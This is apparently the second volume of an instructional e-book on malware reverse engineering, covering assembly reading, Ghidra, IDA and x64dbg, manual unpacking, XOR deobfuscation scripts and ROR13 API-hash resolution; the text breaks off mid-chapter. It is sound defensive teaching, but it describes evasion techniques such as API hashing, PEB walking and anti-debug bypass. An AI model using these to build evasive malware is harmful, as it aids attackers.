Lucent Grid Learning · Malware Analysis

Volume 2 of 2

Malware Analysis
Reverse Engineering

The specialist volume. Assumes Book 1 or equivalent experience. Read disassembled malware, defeat anti-analysis protections, unpack custom packers, reconstruct C2 protocols from raw bytes, and reverse engineer ransomware, rootkits, and RATs at the code level.

12 chapters

~3 hrs reading

Assembly required

Book 1 prerequisite

Two-Volume Series

Malware analysis is one of the broadest technical disciplines in security. This series is split into two books to cover the subject with the depth it deserves. Book 1 covers practitioner skills — triage, static and dynamic analysis, memory forensics, YARA, and detection engineering — and requires no assembly or reverse engineering knowledge. Book 2 (this volume) covers the specialist skills that begin where Book 1 ends.

Book 1

Foundations & Behavioural Analysis

Triage · Static analysis · Dynamic analysis · Memory forensics · YARA · Detection engineering · IOC extraction · IR integration

← Go to Book 1

You are here — Book 2

Reverse Engineering & Advanced Techniques

x86/x64 assembly · Ghidra · IDA Pro · x64dbg · Unpacking · Deobfuscation · Anti-analysis · Shellcode · Rootkits · Ransomware RE · C2 RE

Part I · Chapters 1–3

Assembly and Disassembly

The foundation of reverse engineering — reading x86/x64 assembly, navigating Ghidra, and using IDA Pro with x64dbg for dynamic debugging

Chapter 01 · ~18 min · Assembly & Disassembly Foundational RE

x86/x64 Assembly for Analysts

Registers and the stack, calling conventions, essential instruction set, reading function prologues and epilogues, identifying loops and conditionals in disassembly

Assembly language is the lowest level at which disassemblers show you code. You do not need to write assembly to be a malware analyst — you need to read it. The goal of this chapter is to build the mental model that lets you look at a disassembly listing and understand what the code is doing: what data it is operating on, where it came from, where it is going, and which logical structure it represents.

What a Disassembler Shows You

A disassembler reads the raw bytes of a binary and reconstructs the corresponding assembly instructions. Each line shows an address (where in memory this instruction lives), bytes (the raw encoding), a mnemonic (the human-readable operation name like MOV or CALL), and operands (what the operation acts on). The decompiler goes one step further and reconstructs a C-like pseudocode representation.

The Register Architecture

x86 (32-bit) x64 (64-bit) Size Conventional use ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ EAX RAX 32/64 Accumulator; return value from functions EBX RBX 32/64 General; callee-saved (must be preserved) ECX RCX 32/64 Counter (loops); 1st argument in x64 fastcall EDX RDX 32/64 Data; 2nd argument in x64 fastcall ESI RSI 32/64 Source index (string ops); 2nd arg in Linux x64 EDI RDI 32/64 Destination index; 1st arg in Linux x64 ESP RSP 32/64 Stack pointer — always points to top of stack EBP RBP 32/64 Base pointer — frame pointer in function prologue — R8–R15 64 Additional args (x64 only): R8=3rd, R9=4th Sub-registers (lower portions of RAX): RAX (64-bit) → EAX (lower 32) → AX (lower 16) → AH/AL (high/low 8 bits) ; Writing to EAX zero-extends to RAX — a key x64 behaviour

The Stack and Calling Conventions

The stack is a region of memory that grows downward (toward lower addresses). PUSH decrements the stack pointer and writes a value; POP reads a value and increments the stack pointer. The stack is how functions receive arguments (on x86), save return addresses, and preserve registers they modify.

Calling Conventionx86 cdecl vs x64 Windows fastcall — where arguments live

x86 cdecl (32-bit Windows) — arguments pushed right to left onto stack: ; C: result = CreateFile(lpFileName, dwAccess, dwShare, lpSec, dwCreate, dwFlags, hTemplate) 00401020 6A 00 push 0 ; hTemplateFile = NULL 00401022 68 80 00 00 00 push 80h ; dwFlagsAndAttributes 00401027 6A 02 push 2 ; dwCreationDisposition = CREATE_ALWAYS 00401029 6A 00 push 0 ; lpSecurityAttributes = NULL 0040102B 6A 00 push 0 ; dwShareMode 0040102D 68 00 00 00 40 push 40000000h ; dwDesiredAccess = GENERIC_WRITE 00401032 68 F0 20 40 00 push offset filename_str ; lpFileName 00401037 FF 15 A0 20 40 00 call ds:CreateFileA x64 fastcall (64-bit Windows) — first 4 args in RCX, RDX, R8, R9; rest on stack: ; C: WriteFile(hFile, lpBuffer, nBytes, lpWritten, lpOverlapped) 0000000140001A20 48 8B C8 mov rcx, rax ; hFile (arg 1) 0000000140001A23 48 8D 15 lea rdx, [buffer] ; lpBuffer (arg 2) 0000000140001A2A BA 00 10 00 00 mov r8d, 1000h ; nNumberOfBytesToWrite (arg 3) 0000000140001A2F 4C 8D 4D F8 lea r9, [rbp-8] ; lpNumberOfBytesWritten (arg 4) 0000000140001A33 FF 15 call cs:WriteFile

The Function Prologue and Epilogue

Every function begins with a prologue that sets up its stack frame and ends with an epilogue that tears it down. Recognising these patterns lets you immediately identify function boundaries in a disassembly listing.

Function StructurePrologue, local variable access, and epilogue patterns — x64

Function prologue (x64): 0000000140001000 48 89 5C 24 08 mov [rsp+8], rbx ; save callee-saved reg 0000000140001005 48 89 6C 24 10 mov [rsp+10h], rbp 000000014000100A 48 81 EC A0 00 sub rsp, 0A0h ; allocate stack frame (local vars) 0000000140001010 48 8D 6C 24 20 lea rbp, [rsp+20h] ; set frame pointer Accessing local variables (relative to RBP or RSP): 0000000140001020 C7 45 00 00 00 00 00 mov dword ptr [rbp+0], 0 ; local_var = 0 0000000140001027 48 8B 45 20 mov rax, [rbp+20h] ; load local_var into rax Function epilogue: 0000000140001090 48 8D A5 80 00 00 00 lea rsp, [rbp+80h] ; restore stack pointer 0000000140001097 48 8B 5C 24 08 mov rbx, [rsp+8] ; restore saved registers 000000014000109C 48 8B 6C 24 10 mov rbp, [rsp+10h] 00000001400010A1 C3 ret ; return to caller

Identifying Loops and Conditionals

Control Flow PatternsHow C-level loops and conditionals look in disassembly

C: if (eax == 0) { do_something(); } 00401050 85 C0 test eax, eax ; test eax AND eax → sets ZF if eax==0 00401052 75 0A jnz 0040105E ; jump NOT zero → skip if() body 00401054 E8 xx xx call do_something ; ← only reached if eax was 0 0040105E ... ; ← code after the if block C: for (i = 0; i < count; i++) { process(buf[i]); } 00401080 33 C9 xor ecx, ecx ; ecx = 0 (i initialisation) 00401082 ; ← loop top label 00401082 3B CA cmp ecx, edx ; compare i vs count 00401084 7D 10 jge 00401096 ; if i >= count → exit loop 00401086 8B 04 8B mov eax, [ebx+ecx*4] ; eax = buf[i] (4-byte elements) 00401089 50 push eax ; push buf[i] as argument 0040108A E8 xx xx call process 0040108F 41 inc ecx ; i++ 00401090 EB F0 jmp 00401082 ; jump back to loop top 00401096 ; ← after loop XOR decryption loop (extremely common in malware): 00401100 33 C9 xor ecx, ecx ; counter = 0 00401102 8A 04 0E mov al, [esi+ecx] ; al = encrypted_buf[i] 00401105 34 4A xor al, 4Ah ; XOR with key byte 0x4A ← KEY IS HERE 00401107 88 04 0F mov [edi+ecx], al ; decrypted_buf[i] = al 0040110A 41 inc ecx ; i++ 0040110B 3B CA cmp ecx, edx ; compare i vs length 0040110D 72 F3 jb 00401102 ; jump back if i < length

Essential Instructions — Analyst Reference

Instruction	Operation	Flags Set	Common Use
`MOV dst, src`	Copy src into dst	None	Move data between registers/memory
`LEA dst, [expr]`	Load Effective Address — computes address, doesn't dereference	None	Pointer arithmetic, fast multiply
`PUSH / POP`	Write to/read from top of stack, adjust RSP	None	Save registers, pass arguments (x86)
`CALL target`	Push return address, jump to target	None	Function call
`RET`	Pop return address from stack, jump to it	None	Function return
`ADD / SUB`	Add/subtract; result in destination	CF, ZF, SF, OF	Arithmetic, pointer adjustment
`XOR dst, src`	Bitwise exclusive OR	ZF, SF, CF=0	Decryption, `XOR reg, reg` = zero register
`AND / OR`	Bitwise AND/OR	ZF, SF, CF=0	Masking flags, bit manipulation
`TEST dst, src`	Bitwise AND without storing result — sets flags only	ZF, SF, CF=0	`TEST eax, eax` checks if eax is zero
`CMP dst, src`	Subtraction without storing result — sets flags only	CF, ZF, SF, OF	Comparison before conditional jump
`JMP / Jcc`	Unconditional/conditional jump based on flags	None	Loops, branches, if/else
`SHL / SHR`	Shift left/right (multiply/divide by powers of 2)	CF, ZF, SF	Bit manipulation, fast multiply
`INC / DEC`	Increment/decrement by 1	ZF, SF, OF	Loop counters
`REP MOVS / STOS`	Repeated move/store using RCX as counter	None	memcpy/memset equivalents — common in shellcode

Key Takeaways — Chapter 1

In x64 Windows, function arguments go RCX → RDX → R8 → R9 → stack; recognising this pattern immediately tells you what each argument to an API call is without reading documentation
TEST eax, eax followed by JZ / JNZ is the most common null/zero check pattern — it appears after every function call that returns a handle or status code
An XOR loop with a single-byte immediate value is a decryption routine — the immediate value is the key; write a Python script to decrypt the data before spending time on further analysis
Writing to EAX automatically zero-extends to RAX in x64 — this is why you frequently see MOV eax, ... in 64-bit code even when the value is used in a 64-bit context
The function prologue pattern (SUB RSP, N or register saves followed by local variable setup) immediately identifies function entry points when auto-analysis misses them

Go Deeper

cdecl.org — x86 calling convention reference Microsoft: x64 calling convention documentation

Chapter 02 · ~17 min · Assembly & Disassembly Core Tool

Ghidra from Zero

Project setup and auto-analysis, CodeBrowser navigation, disassembly vs decompiler view, renaming and retyping, cross-references, and the iterative RE workflow

Ghidra is the NSA-developed, open-source reverse engineering framework that has become the primary free tool for malware analysts. It combines disassembly, decompilation, a scripting engine, and a collaborative analysis platform in a single application. This chapter covers the complete workflow from opening a binary for the first time to arriving at a readable, annotated decompilation of its key functions.

Project Setup and Initial Analysis

GhidraOpening a binary and running initial auto-analysis

1. File → New Project → Non-Shared Project → name it 2. File → Import File → select sample.exe Ghidra detects: PE 64-bit, Windows, x86-64 3. Double-click imported file → opens CodeBrowser 4. Prompted: "Analyze?" → YES → run with default options Auto-analysis runs: Disassembler → converts bytes to instructions Function Discovery → identifies function boundaries Data Reference → finds strings, globals, imports Decompiler Parameter → improves decompiled output PDB Analyzer → loads symbols if PDB available Analysis time: 30s–5min depending on binary size After analysis: ~2,000 functions identified in a typical medium-size sample Key windows (arrange to your preference): Listing → disassembly view (the assembly) Decompiler → C-like pseudocode (right pane, sync'd with Listing) Symbol Tree → imports, exports, functions, labels Defined Strings → all extracted strings Program Trees → sections / segments

Reading the Decompiler View

Ghidra Decompiler — FUN_00401000 (before renaming)

undefined8 FUN_00401000(undefined8 param_1, undefined4 param_2) { HANDLE hFile; undefined4 uVar1; undefined8 uVar2; BOOL BVar3; DWORD local_14; hFile = CreateFileW(param_1, 0x40000000, 0, (LPSECURITY_ATTRIBUTES)0x0, 2, 0x80, (HANDLE)0x0); if (hFile == (HANDLE)0xffffffffffffffff) { // INVALID_HANDLE_VALUE return 0; } BVar3 = WriteFile(hFile, param_2, DAT_00403050, &local_14, (LPOVERLAPPED)0x0); CloseHandle(hFile); return (undefined8)BVar3; } // ↑ This is the dropper's file-write function. Rename: write_payload_to_disk

The Iterative RE Workflow — Renaming and Retyping

Raw Ghidra output is unreadable. FUN_00401000, param_1, uVar2 — these names carry no information. The core RE workflow is iterative annotation: identify what a function or variable is, rename it to something meaningful, and watch the decompilation of its callers become clearer as a result.

Ghidra Annotation WorkflowKeyboard shortcuts and annotation techniques

Rename a function (in Listing or Decompiler): Click on function name → press L → type new name → Enter FUN_00401000 → write_payload_to_disk Rename a variable (in Decompiler view): Click on variable → press L → type new name param_1 → target_path, param_2 → payload_data Retype a variable (fix incorrect type inference): Click on variable → press Ctrl+L → enter correct type undefined4 → DWORD, undefined8* → LPWSTR (Correct typing dramatically improves decompiler output for that variable) Cross-references — finding all callers of a function: Right-click function name → References → Find References to... → shows every call site: which function calls write_payload_to_disk and with what args Defined Strings window — fastest way to find interesting functions: Window → Defined Strings Sort by string content, find "C:\ProgramData\..." or "http://..." Double-click string → jumps to .rdata reference Press X (cross-reference) → shows function that loads this string → Navigate there → that's the function that uses the C2 URL

After Annotation — The Readable Function

Ghidra Decompiler — write_payload_to_disk (after renaming)

BOOL write_payload_to_disk(LPWSTR target_path, LPVOID payload_data) { HANDLE hFile; BOOL write_ok; DWORD bytes_written; hFile = CreateFileW(target_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { return FALSE; // file open failed } write_ok = WriteFile(hFile, payload_data, payload_size, &bytes_written, NULL); CloseHandle(hFile); return write_ok; // returns TRUE on success } // Called from: drop_and_execute() with path=C:\ProgramData\MsUpdate\svchost32.exe

Key Takeaways — Chapter 2

The Defined Strings window is the fastest entry point — find the C2 URL or a persistence path string, cross-reference it, and you land directly in the function that matters most
Rename aggressively and early — every renamed function and variable improves the readability of its callers; the analysis compounds as you work outward from known functions
Retyping variables from undefined8 to the correct Windows type dramatically improves decompiler output — LPWSTR vs undefined8* tells Ghidra how to display the data
Cross-references (X in Listing, right-click → References in Decompiler) show you every call site — use them to build the call graph from interesting functions outward to their callers
The iterative workflow — identify a known API call, rename the function that calls it based on what it does, follow cross-references to that function's callers — is the core RE loop that eventually covers the whole binary

Chapter 03 · ~16 min · Assembly & Disassembly Core Tools

IDA Pro and x64dbg

Where IDA and Ghidra differ, graph view, FLIRT signatures for library recognition, x64dbg for dynamic debugging — breakpoints, stepping, memory inspection, runtime patching

IDA Pro is the industry standard disassembler in professional malware analysis and vulnerability research. Ghidra is the free alternative that has closed most of the gap. This chapter covers the IDA-specific capabilities that remain useful alongside Ghidra, and introduces x64dbg — the dynamic debugger that lets you execute malware instruction by instruction and inspect its state at any point.

Where IDA Differs from Ghidra

Capability	IDA Pro	Ghidra
Graph view	Excellent — the original; highly readable CFG with colour-coded edges	Good — available but less mature than IDA's
FLIRT signatures	Extensive library — identifies statically-linked code from hundreds of compilers/libraries	FunctionID (limited); third-party FLIRT imports possible
Decompiler	Hex-Rays (paid add-on) — generally produces cleaner output, especially for x64	Built-in free decompiler — excellent for a free tool; occasionally produces odd output
Scripting	IDAPython — mature, large ecosystem of community scripts	Java and Python — equally capable; growing ecosystem
Cost	$3,000–$15,000+ per seat	Free and open source
Collaborative analysis	IDA Teams (paid)	Built-in shared project support

IDA Graph View — Reading Control Flow

IDA Pro — Graph ViewUnderstanding the control flow graph and its colour coding

In IDA: press Space to toggle between Listing and Graph views Graph view elements: Each node = a basic block (sequence with no branches) Green edge = conditional jump taken (JZ when ZF=1) Red edge = conditional jump NOT taken (fall-through) Blue edge = unconditional jump (JMP) Dashed edge = indirect call (can't statically resolve) Pattern recognition in graph view: Diamond shape → if/else (two branches that rejoin) Loop with back-edge → for/while loop Many small blocks with jumps to same target → switch statement Single node → very small function or heavily obfuscated (flattened CFG) FLIRT signature application: File → Load File → FLIRT Signature File → select appropriate .sig Before: sub_401A00 → After: _memcpy_s (library code — skip it) Before: sub_401C40 → After: strlen (library code — skip it) Focus analysis on functions NOT matched by FLIRT — those are the malware's own code

x64dbg — Dynamic Debugging

x64dbg executes the malware inside a controlled environment and lets you pause execution at any point, inspect registers and memory, modify values, and step instruction by instruction. This is essential when static analysis can't determine what a function does — just run it and watch.

x64dbg WorkflowBreakpoints, stepping, memory inspection, and runtime patching

Opening a sample in x64dbg: File → Open → select sample.exe x64dbg pauses at the system breakpoint (before entry point) Press F9 (Run) → pauses at the entry point (EP) Breakpoint types: Software BP (F2): inserts INT3 byte at address — detected by IsDebuggerPresent! Hardware BP (F2 → right-click → HW BP): uses debug registers — harder to detect Memory BP: fires when a memory region is read/written/executed Stepping controls: F7 → Step Into (execute one instruction; enters CALL) F8 → Step Over (execute one instruction; does NOT enter CALL) F9 → Run (execute until next breakpoint) Ctrl+F9 → Run until return (execute current function to its RET) Inspecting state after pausing: Registers pane: RAX=0x0000000000000001, RCX=0x7FF8A3C0B020... Right-click RAX → Follow in Dump → memory contents at RAX address Right-click on stack entry → Follow in Dump → see string argument value Runtime patching — defeat anti-debug check: Execution reaches: test eax, eax → jnz exit_if_debugger After IsDebuggerPresent returns, RAX=1 (debugger detected) Fix: right-click RAX in registers → Modify → set to 0 Or: right-click JNZ instruction → Assemble → replace with NOP NOP Execution continues past the check → malware proceeds normally

Useful x64dbg Keyboard Reference

x64dbg Quick ReferenceMost-used shortcuts during a malware debugging session

Navigation: Ctrl+G → Go to address (enter VA or symbol name) Ctrl+F → Find in current module (search bytes/strings) Enter → Follow jump / call target in disassembly Minus (-) → Navigate back (undo last jump) Execution: F2 → Toggle software breakpoint at cursor F7 → Step Into (enter CALL targets) F8 → Step Over (execute CALL as one step) F9 → Run until next breakpoint Ctrl+F9 → Run until return (execute current function) F4 → Run to cursor (temp BP at cursor line) Inspection: Space → Assemble (patch instruction at cursor) Ctrl+E → Edit data at selected bytes Right-click reg → Modify (change register value inline) Ctrl+D → Follow in dump (view memory at address) Breakpoints: Ctrl+B → Open breakpoint manager Right-click → HW breakpoint → set hardware BP (no INT3) Right-click memory region → Breakpoint → Execute → memory exec BP

Combining Static and Dynamic Analysis

The most effective RE workflow alternates between Ghidra and x64dbg. Ghidra gives you the big picture — all functions, all strings, the call graph. x64dbg fills in what static analysis can't determine — the runtime value of computed expressions, the result of API calls, the contents of dynamically allocated buffers. When a Ghidra function is confusing, set a breakpoint in x64dbg at its entry and step through it while watching the registers.

Key Takeaways — Chapter 3

IDA's FLIRT signatures identify statically-linked library code — functions matched by FLIRT are not malware logic and can be skipped; focus analysis on unmatched functions
Graph view makes control flow immediately visible — the diamond shape is if/else, the back-edge is a loop; these patterns are identifiable in seconds without reading every instruction
Hardware breakpoints are preferable to software breakpoints when analysing samples that check for debuggers — they use CPU debug registers and do not insert INT3 bytes that IsDebuggerPresent can detect
Runtime patching in x64dbg — modifying a register value or NOP-ing a conditional jump — is the fastest way to bypass anti-analysis checks during dynamic analysis; changes are in-memory and don't affect the file on disk
The static-dynamic loop: analyse in Ghidra to understand structure → set x64dbg breakpoints at interesting functions → observe runtime behaviour → update Ghidra annotations with observed values → repeat

Part II · Chapters 4–6

Unpacking and Deobfuscation

Getting to the real code — manual unpacking to the original entry point, defeating XOR and custom encodings, and reconstructing hidden import tables

Chapter 04 · ~16 min · Unpacking & Deobfuscation Advanced Static

Unpacking in Depth

The OEP concept, manual unpacking workflow in x64dbg, PE reconstruction with Scylla, unpacking common packers, and automated unpacking frameworks

Book 1 showed how to detect packing and unpack UPX with a single command. This chapter covers what to do when that command fails — when the sample uses a custom packer, a renamed UPX stub, or a commercial protector. The technique is universal: let the packer do its job inside the debugger, identify the moment it hands control to the original code, and dump the process memory at that moment to recover the unpacked binary.

The OEP — Original Entry Point

A packed binary has two entry points. The packer entry point is where execution begins — it runs the decompression or decryption stub. The Original Entry Point (OEP) is where the real malware code begins, after the packer has finished its work. The goal of manual unpacking is to pause execution exactly at the OEP, at which point the unpacked binary exists in memory and can be dumped.

Finding the OEP — Three Techniques

OEP DiscoveryThree approaches — ESP trick, hardware BP on stack, tail jump recognition

Technique 1 — The ESP Trick (most reliable for simple packers): 1. Open packed sample in x64dbg, pause at entry point (packer stub) 2. Note RSP value (e.g. 0x0014FF50) 3. Right-click RSP value in stack pane → Set Hardware BP on Access (4-byte) 4. Press F9 (Run) — packer executes 5. Hardware BP fires when packer restores the saved RSP 6. You are now at or very near the OEP — look for the original prologue Technique 2 — Memory BP on unpacked region: 1. Let packer run partially — identify the region being written (memory map) 2. Set memory execute BP on that region (right-click → breakpoint → execute) 3. Press F9 — fires when packer transfers control to decompressed code 4. Step forward carefully — first execution in new region is the OEP Technique 3 — Recognise the tail jump: Most packer stubs end with a jump to the OEP. In disassembly it looks like: 00A01F80 5F pop edi 00A01F81 5E pop esi 00A01F82 5B pop ebx 00A01F83 FF E0 jmp eax ; ← indirect jump to OEP (eax = OEP address) Step to this JMP, read EAX value — that is the OEP. Set BP there.

Dumping and Fixing the Unpacked Binary

ScyllaDumping process memory and rebuilding the import table

Once paused at OEP in x64dbg: Step 1 — Dump the process memory Plugins → Scylla → OEP address auto-filled from current EIP Click "Dump" → saves process memory to unpacked_dump.exe Step 2 — Rebuild the Import Table Problem: the dumped PE has an IAT with invalid addresses (packer modified it) In Scylla: click "IAT Autosearch" → Scylla scans memory for valid IAT If found: click "Get Imports" → displays all resolved imports Click "Fix Dump" → patches the dumped file with corrected IAT Result: unpacked_dump_SCY.exe — analysable in Ghidra/IDA Step 3 — Verify in Ghidra Import unpacked_dump_SCY.exe into Ghidra → run analysis Should now show: full import table with 40+ imports Strings should be visible (the real strings, not the packer's) If Ghidra can't load it: PE reconstruction partially failed — adjust OEP or retry Scylla

Verifying the Dump — Before and After

After Scylla produces the fixed dump, a quick hex inspection confirms the PE header is intact and the IAT has been rebuilt correctly. The MZ/PE signatures should be present at their expected offsets and the import directory should point to valid RVAs.

Unpacked PE Header — Confirming Successful Dump and IAT Reconstruction

Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F Field 0x000000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 ← MZ signature intact 0x00003C E8 00 00 00 ← e_lfanew → PE header at 0xE8 0x0000E8 50 45 00 00 64 86 06 00 A4 B3 C2 65 00 00 00 00 ← PE sig + machine x64 + 6 sections Import Directory RVA (at Optional Header + 0x70 for PE32+): 0x000170 C0 52 40 00 00 00 00 00 ← IAT RVA 0x4052C0 (rebuilt by Scylla) First few entries of rebuilt IAT at RVA 0x4052C0 (file offset 0x4052C0 - imagebase): 0x0052C0 00 13 40 00 00 00 00 00 10 13 40 00 00 00 00 00 ← resolved API addresses Compare packed binary: IAT RVA was 0x00000000 (null) — Scylla populated it correctly

Automated Unpacking

For volume analysis, manual unpacking of every packed sample is impractical. Several automated approaches exist for common packers:

unpac.me — cloud-based automated unpacking service; supports hundreds of packer families; returns the unpacked binary with the detected packer family name
Qiling Framework — Python-based binary emulation; scripts can emulate the packer stub to OEP without needing a real Windows machine or debugger
CAPE Sandbox — Cuckoo fork specifically designed for malware unpacking; automatically captures the unpacked payload from memory and saves it as a separate artefact
Dynamic analysis approach — even without unpacking, dynamic analysis in a monitored VM captures the real behaviour; pair with a memory dump at execution time for Volatility analysis on the unpacked in-memory image

Key Takeaways — Chapter 4

The ESP trick (hardware BP on the initial RSP value) works reliably for most single-layer packers — it fires when the packer restores the saved stack context just before transferring control to the OEP
The tail jump pattern — a series of register pops followed by JMP EAX or PUSH addr; RET — is the most common OEP transfer mechanism; recognising it visually saves time over technique-based approaches
Scylla's IAT reconstruction is essential after dumping — the dump alone has an invalid import table; Fix Dump produces the correctly rebased and import-patched binary that Ghidra can analyse
If IAT autosearch fails, examine the OEP region manually for the GetProcAddress calls the unpacked code uses to self-resolve its imports, then point Scylla's IAT start address manually
For known packers at scale, unpac.me is faster than manual unpacking — reserve manual unpacking for custom packers and novel protectors that automated services can't handle

Chapter 05 · ~15 min · Unpacking & Deobfuscation Advanced Static

Deobfuscation Techniques

XOR decryption loops, base64 variants, control flow obfuscation — opaque predicates and dispatcher patterns, and Ghidra scripting for automated deobfuscation

Obfuscation is the set of techniques used to make code harder to understand without changing what it does. Packing hides the code entirely; obfuscation makes the visible code confusing. The two are often combined: a packed binary that, once unpacked, contains heavily obfuscated code. This chapter covers the most common obfuscation techniques encountered in malware and the analytical approaches to defeat each.

XOR Decryption — Identifying and Scripting

XOR is the most common obfuscation technique in malware. A key byte (or sequence of bytes) is XOR'd with each byte of the obfuscated data. In Ghidra's disassembly, a XOR decryption routine looks like a loop that reads one byte, XORs it with a constant, and writes it back. The constant is the key.

XOR Decryption LoopIdentifying the key and writing a Python decryption script

Ghidra decompiler output for a XOR decryption function: void decrypt_config(byte* buf, int len) { for (int i = 0; i < len; i++) { buf[i] = buf[i] ^ 0x4B; // ← KEY IS 0x4B } } The encrypted data is at offset 0x403020, length 0x80 bytes. Extract it from the binary and decrypt with Python: import struct with open('sample.exe', 'rb') as f: f.seek(0x2020) # file offset (convert from VA 0x403020 with image base 0x400000) encrypted = bytearray(f.read(0x80)) decrypted = bytes(b ^ 0x4B for b in encrypted) print(decrypted) # prints the config in plaintext # b'http://update-service.net/api/v2/check\x00Global\\MicrosoftUpdateMutex\x00...'

Multi-byte XOR and Rolling Key

Rolling XOR KeyKey advances with each byte — common in C2 config encryption

Ghidra decompiler — rolling key XOR: void decrypt_strings(byte* buf, int len) { byte key = 0xAA; // ← initial key byte for (int i = 0; i < len; i++) { buf[i] ^= key; key = (key + 0x07) & 0xFF; // ← key advances by 0x07 each byte } } Python decryption for rolling key: key = 0xAA decrypted = [] for b in encrypted: decrypted.append(b ^ key) key = (key + 0x07) & 0xFF # mirror the key-advance logic exactly print(bytes(decrypted))

Control Flow Obfuscation

Control flow obfuscation makes the logical structure of code difficult to follow without changing its behaviour. Three patterns appear frequently in protected malware:

Control Flow Obfuscation PatternsOpaque predicates, junk code, and the dispatcher pattern

Pattern 1 — Opaque predicate (always-true or always-false branch): 00401200 8B C0 mov eax, eax ; meaningless — sets eax to itself 00401202 85 C0 test eax, eax ; tests eax — will ALWAYS be nonzero after mov eax,eax 00401204 74 20 jz 00401226 ; NEVER taken — dead branch designed to confuse 00401206 ; real code continues here — the jz was always fake Pattern 2 — Junk code insertion: 004012A0 90 nop ; filler 004012A1 87 DB xchg ebx, ebx ; swap ebx with itself — does nothing 004012A3 8D 40 00 lea eax, [eax+0] ; load eax+0 into eax — does nothing 004012A6 ... ; eventually reaches real instruction Pattern 3 — Dispatcher (flattened control flow): All basic blocks jump to a central dispatcher node. Dispatcher reads a "state variable" and routes to the next block. The logical sequence: block 1 → block 5 → block 2 → block 7 But in the graph, every block goes to the dispatcher first. Defeat: track state variable values through x64dbg to recover actual sequence.

Ghidra Scripting for Automated Deobfuscation

Ghidra ScriptPython script to decrypt XOR-obfuscated strings in the binary

# Ghidra Script Manager: Window → Script Manager → New Script → Python from ghidra.program.model.mem import MemoryAccessException XOR_KEY = 0x4B DATA_VA = 0x403020 # virtual address of encrypted string table DATA_LEN = 0x200 # length of the string table mem = currentProgram.getMemory() addr = toAddr(DATA_VA) data = bytearray(mem.getBytes(addr, DATA_LEN)) decrypted = bytes(b ^ XOR_KEY for b in data) print("[+] Decrypted strings:") for s in decrypted.split(b'\x00'): if len(s) > 3: print(" ", s.decode('latin-1', errors='replace')) # Output: # http://update-service.net/api/v2/check # Global\MicrosoftUpdateMutex # C:\ProgramData\MsUpdate\svchost32.exe # HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Key Takeaways — Chapter 5

XOR decryption loops are identifiable by their structure — a loop that reads a byte, XORs with a constant, and writes it back; the constant is the key; extract the data and key and decrypt with a three-line Python script
Rolling keys advance the key value with each byte — mirror the key-advancement arithmetic exactly in your decryption script; even a tiny difference (wrong modulus, wrong increment) produces garbage output
Opaque predicates are always-true or always-false branches that exist only to confuse analysis tools — in x64dbg, run to the branch and observe whether it is always taken or always not-taken, then treat the dead branch as dead code
The dispatcher / flattened control flow pattern is the most time-consuming obfuscation to defeat statically — use x64dbg to record the actual execution sequence by observing the state variable, then annotate Ghidra with the real block order
Ghidra's Python scripting API gives full access to the binary's bytes — automate decryption directly in Ghidra rather than extracting data to a separate script, so decrypted strings appear in the analysis context

Chapter 06 · ~14 min · Unpacking & Deobfuscation Advanced Static

API Hashing and Import Reconstruction

How API hashing works, common hash algorithms (ROR13, djb2), writing a hash resolver script, Scylla import reconstruction, and automated tools for known hashing schemes

API hashing is the technique used when even dynamic import resolution via GetProcAddress leaves too many strings in the binary. Instead of looking up "CreateRemoteThread" by name, the malware computes a hash of every export name in kernel32.dll and compares it to a hardcoded hash value. No API name string ever appears in the binary. From a static analysis perspective, the import table is empty and no strings reveal capability. This chapter covers how to defeat it.

How API Hashing Works

API Hash ResolutionROR13 hash — how the malware finds CreateRemoteThread without naming it

Step 1 — Malware finds kernel32.dll base address via PEB walk: ; PEB → PEB_LDR_DATA → InMemoryOrderModuleList → 3rd entry = kernel32.dll 00401500 64 A1 30 00 mov eax, fs:[0x30] ; PEB address 00401504 8B 40 0C mov eax, [eax+0Ch] ; PEB_LDR_DATA 00401507 8B 40 14 mov eax, [eax+14h] ; InMemoryOrderModuleList.Flink 0040150A 8B 00 mov eax, [eax] ; → 2nd entry (ntdll) 0040150C 8B 00 mov eax, [eax] ; → 3rd entry (kernel32) 0040150E 8B 40 10 mov eax, [eax+10h] ; DllBase = kernel32.dll base Step 2 — Walk kernel32 export table, hash each function name: ; For each export name in kernel32's Export Name Table: ; compute ROR13_hash(name) ; if ROR13_hash == 0x72E2CAE7: this is CreateRemoteThread → save its address Step 3 — Call the resolved function: ; No "CreateRemoteThread" string anywhere in the binary ; Only hash value 0x72E2CAE7 is present call [resolved_fn_ptr] ; calls CreateRemoteThread

Computing ROR13 Hashes — Building a Lookup Table

API Hash SolverPython script — compute ROR13 hashes for all kernel32 exports and match to binary constants

import pefile, struct def ror13(val, bits=32): return ((val >> 13) | (val << (bits - 13))) & 0xFFFFFFFF def hash_api(name: str) -> int: h = 0 for c in name.upper(): # ROR13 is case-insensitive (uppercases first) h = ror13(h) + ord(c) return h & 0xFFFFFFFF # Build lookup table from kernel32 exports pe = pefile.PE(r'C:\Windows\System32\kernel32.dll') lookup = {} for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols: if exp.name: name = exp.name.decode() lookup[hash_api(name)] = name # Hashes extracted from the malware binary (via Ghidra search for dword constants) malware_hashes = [0x72E2CAE7, 0xE553A458, 0x4FDAF6DA, 0x6EEB26FF] for h in malware_hashes: print(f"0x{h:08X} → {lookup.get(h, 'NOT FOUND')}") # Output: # 0x72E2CAE7 → CreateRemoteThread # 0xE553A458 → VirtualAllocEx # 0x4FDAF6DA → WriteProcessMemory # 0x6EEB26FF → OpenProcess # ↑ This sample is a process injector — confirmed from API hashes alone

Finding Hash Values in the Binary

Ghidra — Finding API Hash ConstantsLocating hardcoded hash values in the disassembly

